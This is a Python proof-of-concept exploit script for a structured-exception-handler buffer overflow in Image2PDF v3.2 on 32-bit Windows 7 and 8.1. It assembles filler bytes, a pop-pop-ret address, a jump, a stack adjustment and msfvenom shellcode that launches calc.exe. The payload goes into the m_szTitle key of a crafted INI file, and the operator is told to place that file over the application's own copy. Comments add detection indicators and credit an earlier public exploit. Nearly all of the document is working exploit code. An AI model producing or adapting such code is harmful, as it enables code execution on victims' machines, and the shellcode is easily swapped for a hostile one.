# Image2PDF v3.2
# Buffer overflow SEH PoC
# Tested: Win 7 x86 / Win 8.1 x86
# Reference: original exploit by Robbie Corley
# https://www.exploit-db.com/exploits/38423/
"""Write an Image2PDF.INI whose m_szTitle value is an oversized payload.

The script only builds one string and writes it to FILE in the current
working directory; the final message tells the operator to copy it over
the application's own copy.  Nothing here touches the target application
or the network.

Defensive note: the artefact produced is an INI file whose m_szTitle value
is several kilobytes of mostly non-printable bytes.  An unexpected
modification of that file in the Windows folder, or a title value of that
size, is the indicator a monitor or a bounds-checking parser would catch.
The overflow is presumably triggered when the application parses that key
-- TODO confirm against the referenced advisory.
"""
FILE = 'Image2PDF.INI'  # output filename; also the name quoted in the final message
MAXBUFFERSIZE = 3000  # intended total length of the padded payload (see fill1)
OFFSET = 2972 # Win7 SP1  -- count of 'A' filler bytes before jmp; build-specific
#OFFSET = 2958 # XP SP3
ppr = '\xF2\xA8\x7C\x69' # Pop Pop Ret 697CA8F2
jmp = '\xeb\x06\x90\x90' # jmp $+6
# Adjust esp-1500
movesp = '\x81\xc4\x24\xfa\xff\xff'
# msfvenom -p windows/exec cmd="calc.exe" -f python -b '\x00\x0a\x0d\x40' -s 626
# buf is the generator output pasted verbatim; this script treats the bytes
# as opaque and never decodes or validates them.
buf = ""
buf += "\xd9\xce\xbb\x67\xa7\x27\xf9\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x31\x31\x5f\x18\x83\xc7\x04\x03\x5f\x73\x45"
buf += "\xd2\x05\x93\x0b\x1d\xf6\x63\x6c\x97\x13\x52\xac\xc3"
buf += "\x50\xc4\x1c\x87\x35\xe8\xd7\xc5\xad\x7b\x95\xc1\xc2"
buf += "\xcc\x10\x34\xec\xcd\x09\x04\x6f\x4d\x50\x59\x4f\x6c"
buf += "\x9b\xac\x8e\xa9\xc6\x5d\xc2\x62\x8c\xf0\xf3\x07\xd8"
buf += "\xc8\x78\x5b\xcc\x48\x9c\x2b\xef\x79\x33\x20\xb6\x59"
buf += "\xb5\xe5\xc2\xd3\xad\xea\xef\xaa\x46\xd8\x84\x2c\x8f"
buf += "\x11\x64\x82\xee\x9e\x97\xda\x37\x18\x48\xa9\x41\x5b"
buf += "\xf5\xaa\x95\x26\x21\x3e\x0e\x80\xa2\x98\xea\x31\x66"
buf += "\x7e\x78\x3d\xc3\xf4\x26\x21\xd2\xd9\x5c\x5d\x5f\xdc"
buf += "\xb2\xd4\x1b\xfb\x16\xbd\xf8\x62\x0e\x1b\xae\x9b\x50"
buf += "\xc4\x0f\x3e\x1a\xe8\x44\x33\x41\x66\x9a\xc1\xff\xc4"
buf += "\x9c\xd9\xff\x78\xf5\xe8\x74\x17\x82\xf4\x5e\x5c\x7c"
buf += "\xbf\xc3\xf4\x15\x66\x96\x45\x78\x99\x4c\x89\x85\x1a"
buf += "\x65\x71\x72\x02\x0c\x74\x3e\x84\xfc\x04\x2f\x61\x03"
buf += "\xbb\x50\xa0\x60\x5a\xc3\x28\x49\xf9\x63\xca\x95"
# Buffer
# Layout: OFFSET filler bytes, then jmp, ppr, movesp, buf, then '\x90'
# padding meant to bring the total to MAXBUFFERSIZE.  Python yields '' for a
# negative repeat count, so if OFFSET + 8 + len(movesp) + len(buf) already
# exceeds MAXBUFFERSIZE the result is simply longer than that and no error
# is raised.
fill1 = 'A' * OFFSET + jmp + ppr + movesp + buf + '\x90' * (MAXBUFFERSIZE - OFFSET - 8 - len(buf) - len(movesp))
buffer = fill1  # NOTE: shadows the Python 2 builtin name 'buffer'
# INI skeleton.  The payload is appended directly after the trailing
# "m_szTitle=" so it becomes that key's value; every other key keeps a
# benign default.
ini = """[SaveMode]
m_iMakePDFMode=0
m_iSaveMode=0
m_szFilenameORPath=
m_iDestinationMode=0
m_bAscFilename=0
m_strFileNumber=0001
[BaseSettingDlg]
m_bCheckDespeckle=0
m_bCheckSkewCorrect=0
m_bCheckView=0
m_szDPI=default
m_bCheckBWImage=1
[SetPDFInfo]
m_szAuthor=
m_szSubject=
m_szTitle="""
ini = ini + buffer
print ('Creating %s file...' % FILE)
# The file is written to the current working directory, not to the
# Windows folder named in the final message; handle closed explicitly.
f = open(FILE,'w')
f.write(ini)
f.close()
print ('Overwrite the original %s in C:\Windows folder with the evil one' % FILE)